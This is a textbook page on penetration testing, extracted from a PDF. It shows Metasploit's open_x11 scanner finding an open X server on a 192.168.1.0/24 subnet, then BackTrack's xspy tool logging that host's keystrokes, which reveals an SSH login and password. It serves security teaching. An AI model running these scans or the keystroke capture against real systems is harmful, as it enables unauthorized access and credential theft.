background image

Vulnerability Scanning

55

of archaic boxes out there are still running old, unpatched, and forgotten 
operating systems. As you’ve seen in the preceding two examples, legacy sys-
tems are often the most vulnerable systems on a network.

To run the 

open_x11 

scanner, simply configure as you would most other 

auxiliary modules by setting the 

RHOSTS

 and, optionally, the 

THREADS

 values. A 

session is shown next. Notice at IP address 192.168.1.23 that the scanner has 
found an open X server. This is a serious vulnerability because it allows an 
attacker to gain unauthenticated access to the system: The X system handles 
the GUI including the mouse and keyboard.

msf > 

use auxiliary/scanner/x11/open_x11

msf auxiliary(open_x11) > 

show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > 

set RHOSTS 192.168.1.0/24

RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) >

 set THREADS 50

THREADS => 50
msf auxiliary(open_x11) > 

run

[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32

. . . SNIP . . .

[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed

To see what an attacker could do with a vulnerability like this, start key-

stroke logging using Back|Track’s 

xspy

 tool, like so:

root@bt:/# 

cd /pentest/sniffers/xspy/

root@bt:/pentest/sniffers/xspy# 

./xspy -display 192.168.1.23:0 -delay 100

ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit